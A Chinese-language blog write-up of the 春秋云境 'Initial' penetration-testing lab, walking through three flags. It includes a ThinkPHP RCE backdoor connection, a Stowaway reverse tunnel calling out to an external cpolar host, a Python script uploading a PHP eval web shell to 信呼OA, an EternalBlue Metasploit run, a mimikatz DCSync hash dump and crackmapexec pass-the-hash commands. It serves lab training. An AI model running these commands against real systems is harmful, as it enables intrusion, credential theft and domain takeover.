春秋云境-Initial

r1ck9

春秋云境-Initial

flag01

打开题目,一个登录页面,网站图标可判断出来是thinkphp框架搭建的一个网站

30459138\-e9fa\-4cfb\-ab16\-fd639cb99f45\.png

  • 先fscan扫描一下看看有没有什么后台

./fscan -h 39.98.120.87

f6653bba54156e107e17b1d57a824be8\.png

扫出来有一个thinkphp5023的洞

98fe67ba\-c28b\-4cda\-b8d8\-5fc65422588a\.png

  • 用一个thinkphp的专门的工具ThinkPhpGUI扫一下

d5a8afcc50b9475eebcc9bf91660960a\.png

爆出的是ThinkPHP 5.0.23 RCE漏洞的poc,还找出了一个后门peiqi.php

直接拿poc在get一下,发现并没有什么回显

735d3f4d5337bc641051e4f6b0fe7029\.png

  • 用蚁剑连接后门

23731801fd06248f1de4e103cabc91bb\.png

  • 接下来是一些sudo提权的操作,这个要多复盘学习
Text
1
2
3
4
5
whoami        #确认当前登录用户身份 问出来是普通用户,并非root

uname -a #获取系统内核、发行版、主机名等信息 Linux ubuntu-web01 5.4.0-110-generic *#124-Ubuntu SMP Thu Apr 14 19:46:19 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux*

**sudo -l**** **** #列出当前用户可执行的 sudo 权限命令**

9585e40c1772a429e678fcac437af38c\.png

得到flag的片段1flag{60b53231-


flag02

刚刚一直在外网里面扫,现在到内网里面扫

  • 将fscan传进内网
Text
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
chmod 777 ./fscan

ip a #了解内网的网段
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:1e:d4:00 brd ff:ff:ff:ff:ff:ff
inet 172.22.1.15/16 brd 172.22.255.255 scope global dynamic eth0
valid_lft 315358560sec preferred_lft 315358560sec
inet6 fe80::216:3eff:fe1e:d400/64 scope link
valid_lft forever preferred_lft forever

./fscan -h 172.22.1.0/24

82594ea23f2cbe33d6e1a15afce4ea22\.png

2062e6741ac123bb3a7ad17055f511b9\.png

据此收集到的信息是:

Text
1
2
3
172.22.1.2:**DC域控**
172.22.1.21:Windows的机器并且存在MS17-010 漏洞
172.22.1.18:信呼OA办公系统
  • 下一步,为了进入内网并能成功访问上述内容,我们要用Stowaway搭建隧道

我们将agent版上传到靶机,admin版放到kali中

由于做这个题我是电脑上做的,先要做一步在kali上用cpolar连通外网

cpolar tcp 7000

获得公网ip+port 17.tcp.cpolar.top:12690

现在kali -> vps

Text
1
2
3
上传 admin

./linux_x64_admin -l 12345 -s 123456 #-l (开放端口号) -s (密码)

image\.png

靶机:

Text
1
2
3
4
5
6
7
8
9
10
先放到 /tmp 下

cp ./linux_x64_agent /tmp/linux_x64_agent

cd /tmp

chmod 777 ./linux_x64_agent

./linux_x64_agent -c 17.tcp.cpolar.top:12690 -s 123456 --reconnect 8
#-c 连接目标 -s 密码 --reconnect 8 断开后每隔8秒重连一次

image\.png

回到vps上,已经开始连接

image\.png

  • 设置代理
Text
1
2
3
use 0

socks 5555 #这里随便开一个5555

dd4c7dacf07a7bac0241364b6c6727cf\.png

然后配置代理,在火狐上打开172.22.1.18:信呼OA办公系统

1e3e2ff201690adf917687bc8457594d\.png

18e681daa4e8a1a2d5a8fc7442bcca2d\.png

用bp爆破,得到 admin/admin123

  • 上传后门
1
2
3
4
5
6
7
8
import requests
s=requests.session()
p={"http":"socks5h://127.0.0.1:5555","https":"socks5h://127.0.0.1:5555"}
u="http://172.22.1.18/"
s.post(u+"?a=check&m=login",data={"adminuser":"YWRtaW4=","adminpass":"YWRtaW4xMjM="},proxies=p)
r=s.post(u+"index.php?a=upfile&m=upload",files={"file":('1.php',"<?php eval($_POST[Infernity]);")},proxies=p)
s.get(u+f"task.php?m=qcloudCos|runt&a=run&fileid={r.json()['id']}",proxies=p)
print(s.post(u+r.json()['filepath'].split('.uptemp')[0]+'.php',data={"Infernity":"system('whoami');"},proxies=p).text)
  • 给蚁剑配一个代理,ip是我vps的ip,端口是socks的

image\.png

  • 连后门

image\.png

dir C:\flag* /s /b

43184b0f4034a16632f8f0789419e919\.png

5334f09e92906ef1d5747018a61b2e46\.png

flag02: 2ce3-4813-87d4-


flag03

从上一图末的提示,最后一个flag在DC中,我们需要渗透到内网中,并利用漏洞获得DC的权限

根据flag02中fscan内网出来的,我们借助MS17-010 漏洞

  • 配置proxychains4代理
Text
1
2
3
sudo vim /etc/proxychains4.conf

写入:socks5 127.0.0.1 5555
  • 利用msfconsole渗透
Text
1
2
3
4
5
proxychains4 msfconsole 
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

289a37b1e9b906558e0e7164276bfd9d\.png

c99724a7a0a481676c12d1be94ea97e5\.png

win了 成功渗透

  • 获得管理员的hash
Text
1
2
load kiwi     #加载这个抓取hash的模块
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit # 导出域内所有用户的信息(包括哈希值)

807ad7dd\-6769\-48a1\-a278\-bb4a69c1bf3d\.png

11a4de15\-6630\-4d6f\-8553\-23340429d9e2\.png

Administrator 10cf89a850fb1cdbe6bb432b859164c8

  • 利用crackmapexec打hash传递
Text
1
2
3
proxychains4 crackmapexec smb <域控IP> -u Administrator -H <你的NTLM哈希> -d <域名> -x "<执行语句>"

proxychains4 crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type C:\Users\Administrator\flag\flag03.txt"

7f8b0ed7b1944b2437cb549177c3bc04\.png

flag03: e8f88d0d43d6}


综上,flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}

  • 标题: 春秋云境-Initial
  • 作者: r1ck9
  • 创建于 : 2026-04-11 02:17:00
  • 更新于 : 2026-08-12 16:40:35
  • 链接: https://www.r1ck9.top/2026/04/11/Initial/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
目录
春秋云境-Initial